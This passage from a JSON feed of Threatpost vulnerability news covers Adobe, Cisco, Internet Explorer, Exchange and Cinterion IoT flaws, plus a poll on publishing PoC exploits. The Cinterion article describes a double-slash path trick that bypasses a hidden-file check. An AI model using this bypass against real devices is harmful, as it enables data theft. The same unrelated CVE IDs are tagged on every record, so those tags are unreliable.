_**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-06-01T16:07:45", "type": "threatpost", "title": "Apple Pays $100K Bounty for Critical 'Sign in With Apple' Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-06-01T16:07:45", "id": "THREATPOST:DF1387D21FA2EBF23BBB67081E7B75EC", "href": "https://threatpost.com/apple-100k-bounty-critical-sign-in-with-apple-flaw/156167/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:22:25", "description": "Adobe has released an out-of-band patch for a critical vulnerability in its Creative Cloud Desktop Application for Windows. The flaw can be exploited by an attacker to delete specific arbitrary files on the victim\u2019s system.\n\nCreative Cloud acts as a central console for desktop users to quickly launch, manage and update their Adobe apps, such as Photoshop, Acrobat, Illustrator and more. Specifically affected is the Creative Cloud desktop application version 5.0 and earlier; Adobe has made the necessary fixes in version 5.1 of the application.\n\n\u201cSuccessful exploitation could lead to arbitrary file deletion in the context of the current user,\u201d said Adobe, [in a Tuesday post](<https://helpx.adobe.com/security/products/creative-cloud/apsb20-11.html>). \u201cAdobe recommends users update their product installations to the latest versions using the instructions referenced in the security bulletin.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaw ([CVE-2020-3808](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-3808>)) stems from a time-of-check to time-of-use (TOCTOU) race condition. A race condition occurs when two or more system operations can access shared data, and they try to change it at the same time. This specific type of race condition involves the checking of the state of a part of a system (such as a security credential) and the use of the results of that check being done at the same time.\n\nIf exploited, the flaw could enable arbitrary file deletion, allowing an attacker to delete certain critical files. However, further details about the attack \u2014 such as whether an attacker would need to be local or remote, or whether they would need to be authenticated \u2014 were not detailed by Adobe. Threatpost has reached out for further clarification.\n\nThe security upgrade is a \u201cpriority 2\u201d update. According to Adobe, that means that it resolves vulnerabilities in a product that has historically been at elevated risk \u2013 but that there are currently no known exploits.\n\n\u201cBased on previous experience, we do not anticipate exploits are imminent. As a best practice, Adobe recommends administrators install the update soon (for example, within 30 days),\u201d according to Adobe.\n\nIt\u2019s the second out-of-band update for [Adobe in March](<https://threatpost.com/critical-adobe-photoshop-acrobat-reader-flaws/153902/>). Last week Adobe disclosed an update addressing critical vulnerabilities in its Photoshop and Acrobat Reader products, which if exploited could allow arbitrary code-execution. Overall, Adobe last week patched flaws tied to 41 CVEs across its products, 29 of which were critical in severity. The fixes were released outside of Adobe\u2019s regularly scheduled update day, which was earlier in March (during which Adobe had no patches).\n\nAdobe credited Jiadong Lu of South China University of Technology and Zhiniang Peng of Qihoo 360 Core Security (@edwardzpeng) for finding the flaw.\n", "cvss3": {}, "published": "2020-03-24T17:46:31", "type": "threatpost", "title": "Critical Adobe Flaw Fixed in Out-of-Band Security Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3808"], "modified": "2020-03-24T17:46:31", "id": "THREATPOST:5B34B9C962E93AFAD432CA452F1AA316", "href": "https://threatpost.com/critical-adobe-flaw-out-of-band-security-update/154075/", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-10-15T22:24:08", "description": "A critical flaw in the High Availability (HA) service of Cisco Smart Software Manager On-Prem Base has been uncovered, which would open the door to remote attackers thanks to its use of a static, default password, even if the platform isn\u2019t directly connected to the internet.\n\nCisco Smart Software Manager On-Prem Base is used to manage a customer or partner\u2019s product licenses, providing near real-time visibility and reporting of the Cisco licenses that an organization purchases and consumes. According to Cisco\u2019s [product literature](<https://www.cisco.com/c/dam/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/smart-software-manager-onprem.pdf>), the platform is aimed at \u201ccustomers who have strict security requirements and do not want their products to communicate with the central licensing database on Smart Software Manager over a direct Internet connection,\u201d like financial institutions, utilities, service providers and government organizations.\n\nThe hard-coded password is for \u201ca [HA] system account [that] is not under the control of the system administrator,\u201d Cisco said in [an advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-on-prem-static-cred-sL8rDs8>) issued Wednesday on the bug, tracked as CVE-2020-3158. Essentially, anyone who discovered the password (presumably available in installation guides or other documentation available online), could log onto this account and then, from there, connect to the Cisco Smart Software Manager On-Prem Base.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cVulnerabilities like CVE-2020-3158 could not be any easier for attackers to compromise,\u201d Chris Hass, director of information security and research at Automox, told Threatpost. \u201cSystems with default, hardcoded credentials completely removes the need for any real technical skill, and drastically reduces the time to be weaponized.\u201d\n\nThe vulnerability, which has a score of 9.8 on the CVSS bug-severity scale, \u201ccould allow an unauthenticated, remote attacker to access a sensitive part of the system with a high-privileged account,\u201d Cisco said. \u201cA successful exploit could allow the attacker to obtain read-and-write access to system data, including the configuration of an affected device.\u201d\n\nThe good news is, while attackers would gain access to a sensitive portion of the system, they would not have full administrative rights to control the device.\n\nNo workaround are available, but Cisco issued a patch this week (Cisco Smart Software Manager On-Prem release 7-202001). The vulnerability only affects systems if the HA feature is enabled. HA is not enabled by default.\n\nSteven Van Loo of hIQkru was given credit for discovering the flaw.\n\n\u201cIt is unfortunate that the [lessons of Mirai](<https://threatpost.com/mirai-botnet-sees-big-2019-growth-shifts-focus-to-enterprises/146547/>) have not translated into stronger security hardening practices,\u201d Hass said. \u201cAnd to see manufacturers and critical service providers continue to ignore the basics of cyber-hygiene is disappointing.\u201d\n\n## A Buggy Start to the Year\n\nCisco has released patches for a number of flaws already in 2020, including fixes for [five critical vulnerabilities](<https://threatpost.com/critical-cisco-cdpwn-flaws-network-segmentation/152546/>) that were discovered in Cisco Discovery Protocol (CDP), the info-sharing layer that maps all Cisco equipment on a network. Dubbed \u201cCDPwn,\u201d they can allow attackers with an existing foothold in the network to break through network segmentation efforts and remotely take over millions of devices.\n\nIn January, high-severity vulnerabilities affecting over a half dozen of its small business switches [were patched](<https://threatpost.com/cisco-patches-high-severity-bugs-in-switch-lineup/152392/>), which allow remote unauthenticated adversaries to access sensitive information and level denial-of-service (DoS) attacks against affected gear.\n\nSeparately, it has patched two high-severity vulnerabilities in its popular Webex video conferencing platform. [One of them ](<https://threatpost.com/cisco-webex-flaw-lets-unauthenticated-users-join-private-online-meetings/152191/>)could let strangers barge in on password-protected meetings \u2013 no authentication necessary; the other[ that was patched](<https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/>) could allow remote code execution.\n\nAlso in January, a critical Cisco vulnerability [emerged in its administrative management tool](<https://threatpost.com/cisco-critical-network-security-tool-flaw/152131/>) for Cisco network security solutions. The flaw could allow an unauthenticated, remote attacker to gain administrative privileges on impacted devices.\n\nAnd to kick off the year, [three critical vulnerabilities](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>) impacting a key tool for managing its network platform and switches were patched. The bugs could allow an unauthenticated, remote attacker to bypass endpoint authentication and execute arbitrary actions with administrative privileges on targeted devices, the vendor said. Proof-of-concept exploits [emerged shortly](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) after disclosure.\n", "cvss3": {}, "published": "2020-02-20T17:29:46", "type": "threatpost", "title": "Critical Cisco Bug Opens Software Licencing Manager to Remote Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3158"], "modified": "2020-02-20T17:29:46", "id": "THREATPOST:74D46F285623FE008F8AABA5323341D4", "href": "https://threatpost.com/critical-cisco-bug-software-licencing-remote-attack/153086/", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2020-10-16T23:18:13", "description": "An unpatched remote code-execution vulnerability in Internet Explorer is being actively exploited in the wild, Microsoft has announced. It\u2019s working on a patch. In the meantime, workarounds are available.\n\nThe bug (CVE-2020-0674) which is listed as critical in severity for IE 11, and moderate for IE 9 and IE 10, exists in the way that the jscript.dll scripting engine handles objects in memory in the browser, according to [Microsoft\u2019s advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001>), issued Friday.\n\nThe vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user \u2013 meaning that an adversary could gain the same user rights as the current user.\n\n[](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)\n\n\u201cIf the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system,\u201d Microsoft explained. \u201cAn attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nAn attack could be carried out using a malicious website designed to exploit the vulnerability through IE, the advisory noted. Threat actors could lure victims to the site by sending an email, through watering-hole techniques, via malicious documents containing a web link and other social-engineering efforts.\n\nThere is a workaround available from Microsoft, as well as a [micropatch from 0patch](<https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html>), released on Tuesday.\n\n## Darkhotel APT Active Attacks\n\nThe in-the-wild attacks are likely the work of the Asian APT known as Darkhotel, according to the researchers at Qihoo 360 who found the bug.\n\n\u201cThe impact [could be] no less than the damage caused by the previous WannaCry ransomware virus,\u201d the security firm said in a Chinese-language [web advisory](<https://www.geekpark.net/news/254734>). \u201cAt present, it is judged from the details and characteristics of the captured attacks that the zero-day vulnerability of IE browser is suspected to have come from the Peninsula\u2019s APT organization, Darkhotel.\u201d\n\nDarkhotel was first identified in [2014](<https://threatpost.com/darkhotel-apt-group-targeting-top-executives-in-long-term-campaign/109265/>) by Kaspersky researchers, who said the group had been active since at least 2007. The group is known for targeting diplomats and corporate executives via Wi-Fi networks at luxury hotels \u2013 but it has widened its targeting over the years, while continuing to [leverage zero-day vulnerabilities](<https://threatpost.com/darkhotel-exploits-microsoft-zero-day-vbscript-flaw/136685/>) and exploits.\n\nIn this case, Darkhotel is using Office documents for targeted attacks, according to Qihoo 360.\n\n\u201cThe attacker\u2019s in-field exploitation embeds the vulnerability in an Office document, and users will be successful when they open an Office document or browse the web,\u201d the firm warned. \u201cOnce the user opens the malicious document carrying the vulnerability, he will browse the malicious webpage and execute the attack program. The user is not even aware that the device has been controlled. The attacker can take the opportunity to implant ransomware, monitor and monitor, and steal sensitive information And so on.\u201d\n\n## Patch and Workaround\n\nWhile Microsoft is aware of \u201climited targeted attacks,\u201d a patch won\u2019t be released until next month\u2019s Patch Tuesday, according to the computing giant.\n\n\u201cOur standard policy is to release security updates on Update Tuesday, the second Tuesday of each month. This predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers,\u201d it said.\n\nOne of the reasons the sense of urgency may be less than one would expect with a zero-day is the fact that all supported versions of IE in their default configuration use Jscrip9.dll as their scripting engine, which is not vulnerable to the flaw. However, the issue affects versions of IE being used in Windows 7, which [reached end-of-life](<https://threatpost.com/get-ready-for-the-microsoft-windows-7-eol-on-january-14th/151571/>) last week and therefore no longer supported. Qihoo 360 warned that this install base in particular is at risk.\n\nFor those that do use jscript.dll, Microsoft detailed a workaround that involves using administrative commands to restrict access to the scripting library. It\u2019s not ideal however: It could result in reduced functionality for components or features that rely on jscript.dll.\n\n\u201cFor example, depending on the environment, this could include client configurations that leverage proxy automatic configuration scripts (PAC scripts),\u201d Microsoft said. \u201cThese features and others may be impacted.\u201d\n\nAlso, users will need to revert this workaround in order to install any future patches or updates.\n\nThe team at 0patch has meanwhile released micropatch this week that implements the workaround while addressing some of the downsides.\n\n> We are planning to issue a micropatch for CVE-2020-0674 next week which will prevent Internet Explorer from loading jscript.dll, effectively implementing Microsoft's workaround but without some unwanted side effects such as breaking the sfc command. \n(cont)\n> \n> \u2014 0patch (@0patch) [January 19, 2020](<https://twitter.com/0patch/status/1218889033373364229?ref_src=twsrc%5Etfw>)\n\n\u201cBecause the provided workaround has multiple negative side effects, and because it is likely that Windows 7 and Windows Server 2008 R2 users without Extended Security Updates will not get the patch at all (their support ended this month), we decided to provide a micropatch that simulates the workaround without its negative side effects,\u201d the company said in a blog. \u201cMicrosoft\u2019s workaround comprises setting permissions on jscript.dll such that nobody will be able to read it. This workaround has an expected negative side effect that if you\u2019re using a web application that employs legacy JScript (and can as such only be used with Internet Explorer), this application will no longer work in your browser.\u201d\n\nAccording to 0patch, other negative side effects of the workaround that the micropatch avoids are:\n\n * Windows Media Player is [reported to break on playing MP4 files](<https://www.askwoody.com/forums/topic/yet-another-jscript-vulnerability/#post-2086829>).\n * The sfc (Resource Checker), a tool that scans the integrity of all protected system files and replaces incorrect versions with correct Microsoft versions, [chokes on _jscript.dll_ with altered permissions](<https://www.askwoody.com/forums/topic/yet-another-jscript-vulnerability/#post-2086857>).\n * [Printing to \u201cMicrosoft Print to PDF\u201d is reported to break](<https://www.askwoody.com/forums/topic/yet-another-jscript-vulnerability/#post-2087468>).\n * Proxy automatic configuration scripts (PAC scripts) may not work.\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n", "cvss3": {}, "published": "2020-01-21T14:58:58", "type": "threatpost", "title": "Microsoft Zero-Day Actively Exploited, Patch Forthcoming", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0674", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-21T14:58:58", "id": "THREATPOST:16E580ECF9CBAD8F883D6241A7754060", "href": "https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T23:18:05", "description": "When it comes to the release of proof-of-concept (PoC) exploits, more security experts agree that the positives outweigh the negatives, according to a recent and informal Threatpost poll.\n\n[](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)Last week, [Threatpost conducted a reader poll](<https://threatpost.com/poll-published-poc-exploits-good-bad/151966/>) and almost 60 percent of 230 security pundits thought it was a \u201cgood idea\u201d to publish PoC code for zero days. Up to 38 percent of respondents, meanwhile, argued it wasn\u2019t a good idea.\n\nThe debate comes on the heels of PoC code being released last week for an [unpatched remote-code-execution vulnerability](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products. The PoC exploits, which were published to showcase how the vulnerability in a system can be exploited, raised questions about the positive and negative consequences of releasing such code for an unpatched vulnerability.\n\nSome argued that the code can be used to test networks and pinpoint vulnerable aspects of a system, as well as motivate companies to patch, but others in the security space have argued that PoC code gives attackers a blueprint to launch and automate attacks.\n\n## Security Motivator\n\nMany security experts point to the role of PoC code publication in motivating impacted companies and manufacturers to adopt more effective security measures. That was the argument of one such advocate, Dr. Richard Gold, head of security engineering at Digital Shadows, who said that PoC code enables security teams to test if their systems are exploitable or not.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/21153903/tp-poll.png>)\n\n\u201cRather than having to rely on vendor notifications or software version number comparisons, a PoC allows the direct verification of whether a particular system is exploitable,\u201d Gold told Threatpost. \u201cThis ability to independently verify an issue allows organizations to better understand their exposure and make more informed decisions about remediation.\u201d\n\nIn fact, up to 85 percent of respondents said that the release of PoC code acts as an \u201ceffective motivator\u201d to push companies to patch. Seventy-nine percent say that the disclosure of a PoC exploit has been \u201cinstrumental\u201d in preventing an attack. And, 85 percent of respondents said that a PoC code release is acceptable if a vendor won\u2019t fix a bug in a timely manner.\n\nWhen it comes to the[ recent Citrix vulnerability (CVE-2019-19781)](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) for instance, advocates argue that, though PoC exploits were released before a patch was available, the code drew attention to the large amounts of vulnerable devices that were online. Citrix has also [accelerated its patch schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) after PoC exploits were released (though there is no proof of correlation between this and the PoC exploit releases).\n\n\u201cAs a result [of the Citrix PoC exploits], there has been a widespread effort to patch or mitigate vulnerable devices rather than leaving them unpatched or unsecured,\u201d Gold stressed.\n\n## A Jump in Actual Exploits\n\nOn the flip-side of the argument, many argue that the release of the Citrix PoC exploits were a bad idea. They say attacks attempting to exploit the vulnerability skyrocketed as bad actors rushed to exploit the vulnerabilities before they are patched. In fact, 38 percent of respondents in Threatpost\u2019s poll argued that PoC exploit releases are a bad idea.\n\nMatt Thaxton, senior consultant at Crypsis Group, thinks that the \u201cultimate function of a PoC is to lower the bar for others to begin making use of the exploit.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/21154131/tp-poll-2.png>)\n\n\u201cI believe there are more negatives than positives to publishing proofs, and generally, it is not a good idea,\u201d he told Threatpost. \u201cIn many cases, PoC\u2019s are put out largely for the notoriety/fame of the publisher and for the developer to \u2018flex\u2019 their abilities.\u201d\n\nJoseph Carson, chief security scientist at Thycotic, told Threatpost that while he thinks PoC exploits can have a positive impact, \u201cit is also important to include what defenders can do to reduce the risks such a methods to harden systems or best practices.\u201d\n\n\u201cLet\u2019s be realistic, once a zero-day is known, it is only a matter of time before nation states and cybercriminals are abusing them,\u201d said Carson. \u201cSometimes they already know about the zero-day and have been abusing them for years.\u201d\n\nRespondents in the poll were also split about the right amount of time that\u2019s appropriate to release PoC code after a flaw has been disclosed, with 29 percent arguing 90 days is the appropriate amount and others opting for one month (25 percent), one week (23 percent) or two weeks (14 percent).\n\nThis issue of a PoC exploit timeline also brings up important questions around patch management for companies dealing with the fallout of publicly-released code. Some, like Thaxton, say that PoC exploit advocates fail to recognize the complexity of patching large environments: \u201cI believe the release of PoC code functions more like an implied threat to anyone that doesn\u2019t patch: \u2018You\u2019d better patch . . . or else,'\u201d he said \u201cThis kind of threat would likely be unacceptable outside of the infosec world. This is even more obvious when PoCs are released before or alongside a patch for the vulnerability.\u201d\n\n## PoC Exploits Surge\n\nAt the end of the day, PoC exploits are continuing to be published. In fact, beyond the release of the Citrix PoC code, a slew of other PoC exploits were released last week, [including ones for](<https://threatpost.com/poc-exploits-published-for-microsoft-crypto-bug/151931/>) a recently patched [crypto-spoofing vulnerability](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) found by the [National Security Agency](<https://threatpost.com/podcast-nsa-reports-major-crypto-spoofing-bug-to-microsoft/151900/>) (NSA) and [reported to Microsoft](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>); and another for critical flaws impacting the [Cisco Data Center Network Manager](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) tool for managing network platforms and switches.\n\nGold, for his part, argued that distinguishing a fine line between a theoretical vulnerability and a successful exploitation of a real system makes all the difference when it comes to PoC exploits versus active exploits.\n\n\u201cOnce that threshold has been crossed, it is understood that attackers will most likely be exploiting this vulnerability in real attacks,\u201d he said. \u201cThis often provided impetus to companies to patch their systems.\u201d\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Featured](<https://threatpost.com/category/featured/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2020-01-22T11:01:52", "type": "threatpost", "title": "PoC Exploits Do More Good Than Harm: Threatpost Poll", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-22T11:01:52", "id": "THREATPOST:48D622E76FCC26F28B32364668BB1930", "href": "https://threatpost.com/poc-exploits-do-more-good-than-harm-threatpost-poll/152053/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:15:05", "description": "Researchers are urging connected-device manufacturers to ensure they have applied patches addressing a flaw in a module used by millions of Internet-of-Things (IoT) devices. If exploited, researchers speculated that the flaw could allow attackers to knock out a city\u2019s electricity or even overdose a medical patient.\n\nThe vulnerability exists in a widely used Cinterion module, a small electronic device embedded in IoT devices that connects to wireless networks and sends and receives data. The module is manufactured by Thales, a French company that designs and builds electrical systems for aerospace markets.\n\nResearchers discovered the flaw in Cinterion\u2019s EHS8 module \u2013 however, further testing revealed that five other models in the same product line were also affected (BGS5, EHS5/6/8, PDS5/6/8, ELS61, ELS81, PLS62). The flaw could be exploited to steal confidential information, take control of devices, gain access to control networks and more.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201c[The modules] store and run Java code, often containing confidential information like passwords, encryption keys and certificates,\u201d said Adam Laurie, with IBM X-Force Threat Intelligence, [in a Wednesday post](<https://securityintelligence.com/posts/new-vulnerability-could-put-iot-devices-at-risk/>). \u201cUsing information stolen from the modules, malicious actors can potentially control a device or gain access to the central control network to conduct widespread attacks \u2013 even remotely via 3G in some cases.\u201d\n\nThe vulnerability ([CVE-2020-15858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15858>)) was first discovered last September, and Thales issued a fix in early 2020 \u2013 but while patches are available, researchers warn that it will take a while for many critical-infrastructure manufacturers to apply them to their devices. Researchers disclosed the flaw on Wednesday, after working with Thales \u201cto ensure users are aware of the patch and taking steps to secure their systems.\u201d\n\nResearchers found a way to bypass security checks that keep files or operational code hidden from unauthorized users.\n\nThe flaw exists in the way that AT commands are processed by the module, Dan Crowley, research director at IBM X-Force Red, told Threatpost. It is related to a string of Java code that counts the number of characters in the path substring.\n\nThis string of code checks if the fourth character of a path substring is a dot. Normally, any attempt to access hidden files with a dot prefix will be denied (example: a:/.hidden_file) \u2013 However, replacing the slash with double slash (example: a://.hidden_file) will cause the condition to fail. An attacker could therefore use the dot-prefixed filename to bypass the security test condition.\n\n\u201cA real-world attacker could go wardialing to try to identify modems over the cellular network, attempting to issue the AT command that exploits the flaw,\u201d Crowley explained. \u201cSome of these will be the vulnerable module, and an attacker will then have an assortment of phone numbers and associated code retrieved from the device at that number. By inserting backdoors into the code and writing them back, the attacker would be in control of various IoT devices around the world. \u201d\n\nIf exploited, attackers could potentially access the wealth of confidential data stored by the modules. This may include intellectual property (IP), credentials, passwords, encryption keys and more. And, due to the sheer breadth of connected devices that are powered by this module \u2013 from medical devices to connected utilities \u2013 researchers warn that the potential impact of the flaw could be dire if not patched.\n\nFor instance, the flaw could be used in medical devices that leverage the module to manipulate readings from monitoring devices, to cover up concerning vital signs or create false panic.\n\n\u201cIn a device that delivers treatment based on its inputs, such as an insulin pump, cybercriminals could over- or underdose patients,\u201d said researchers.\n\nAnd in the utility space, it could be used to compromise smart meters to deliver falsified readings that increase or reduce a monthly bill.\n\n\u201cWith access to a large group of these devices through a control network, a malicious actor could also shut down meters for an entire city, causing wide-reaching blackouts that require individual repair visits, or, even worse, damage to the grid itself,\u201d said researchers.\n\nVulnerabilities and security issues [continue to plague connected devices](<https://threatpost.com/iot-security-healthcare-industry/150157/>) \u2013 even as the number of internet-connected devices used globally is predicted to grow to [55.9 billion](<https://blogs.idc.com/2019/11/04/how-you-contribute-to-todays-growing-datasphere-and-its-enterprise-impact/>) by 2025. More than half of all IoT devices are vulnerable to medium- or high-severity attacks, meaning that enterprises are sitting on a \u201cticking IoT time bomb,\u201d [researchers warned earlier this year](<https://threatpost.com/half-iot-devices-vulnerable-severe-attacks/153609/>).\n\nX-Force security researchers for their part said that this specific patch can be administered by IoT manufacturers in two ways \u2013 either by plugging in a USB to run an update via software, or by administering an over-the-air (OTA) update. However, the more heavily regulated devices, including connected medical devices or industrial-control gear, will have more difficulty applying the patch, since doing so may require recertification, an often time-intensive process, they said.\n\n\u201cThe patching process for this vulnerability is completely dependent on the manufacturer of the device and its capabilities \u2013 for example, whether the device has access to the internet could make it complicated to work with,\u201d they said.\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-19T20:58:28", "type": "threatpost", "title": "Researchers Warn of Flaw Affecting Millions of IoT Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15858", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-19T20:58:28", "id": "THREATPOST:40065E8C90768C4FEA330195000FA7DB", "href": "https://threatpost.com/flaw-affecting-millions-iot-devices/158472/", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-10-15T22:21:46", "description": "Over 80 percent of exposed Exchange servers are still vulnerable to a severe vulnerability \u2013 nearly two months after the flaw was patched, and after researchers warned that multiple threat groups were exploiting it.\n\nThe vulnerability in question ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) exists in the control panel of Exchange, Microsoft\u2019s mail server and calendaring server. The flaw, which stems from the server failing to properly create unique keys at install time, opens servers up to authenticated attackers, who could execute code remotely on them with system privileges.\n\nResearchers recently used Project Sonar, a scanning tool, to analyze internet-facing Exchange servers and sniff out which were vulnerable to the flaw. Out of 433,464 internet-facing Exchange servers observed, at least 357,629 were vulnerable (as of March 24).\n\n[](<https://threatpost.com/newsletter-sign/>)\u201cIf your organization is using Exchange and you aren\u2019t sure whether it has been updated, we strongly urge you to skip to the Taking Action section immediately,\u201d said Tom Sellers, manager of the Rapid7 Labs team, in a [Monday analysis](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>).\n\nWhile the flaw was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates, researchers warned [in a March advisory](<https://www.volexity.com/blog/2020/03/06/microsoft-exchange-control-panel-ecp-vulnerability-cve-2020-0688-exploited/>) that unpatched servers are being exploited in the wild by unnamed advanced persistent threat (APT) actors. Attacks [first started late February](<https://www.tenable.com/blog/cve-2020-0688-microsoft-exchange-server-static-key-flaw-could-lead-to-remote-code-execution?utm_source=charge&utm_medium=social&utm_campaign=internal-comms>) and targeted \u201cnumerous affected organizations,\u201d researchers said. They observed attackers leverage the flaw to run system commands to conduct reconnaissance, deploy webshell backdoors and execute in-memory frameworks post-exploitation.\n\nBrian Gorenc, director of vulnerability research and head of Trend Micro\u2019s ZDI program (which was credited with discovered the flaw) told [Threatpost via email](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that while the vulnerability was labelled \u201cimportant\u201d in severity by Microsoft, researchers opine it should be treated as \u201ccritical.\u201d\n\n\u201cThat\u2019s why we worked with Microsoft to get it patched through coordinated disclosure, and it\u2019s why we provided defenders detailed information about it through our blog,\u201d he said. \u201cWe felt Exchange administrators should treat this as a Critical patch rather than Important as labelled by Microsoft. We encourage everyone to apply the patch as soon as possible to protect themselves from this vulnerability.\u201d\n\nThe patch management issues with Exchange servers extend beyond CVE-2020-0688. Sellers said his investigation revealed that over 31,000 Exchange 2010 servers have not been updated since 2012. And, there are nearly 800 Exchange 2010 servers that have never been updated, he said.\n\nSellers urged admins to verify that an update has been deployed. He also said users can determine whether anyone has attempted to exploit the vulnerability in their environment: \u201cSince exploitation requires a valid Exchange user account, any account tied to these attempts should be treated as compromised,\u201d Sellers said.\n\n> If your org uses Microsoft Exchange I *strongly* recommend you make sure the patch for CVE-2020-0688 (Feb 11) is installed.\n> \n> Unpatched means phished user = SYSTEM on OWA servers.[@Rapid7](<https://twitter.com/rapid7?ref_src=twsrc%5Etfw>) Project Sonar found at least 357,629 unpatched hosts.\n> \n> Blog post: <https://t.co/DclWb3T0mZ>\n> \n> \u2014 Tom Sellers (@TomSellers) [April 6, 2020](<https://twitter.com/TomSellers/status/1247215382773018624?ref_src=twsrc%5Etfw>)\n\n\u201cThe most important step is to determine whether Exchange has been updated,\u201d Sellers said. \u201cThe update for CVE-2020-0688 needs to be installed on any server with the Exchange Control Panel (ECP) enabled. This will typically be servers with the Client Access Server (CAS) role, which is where your users would access Outlook Web App (OWA).\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This 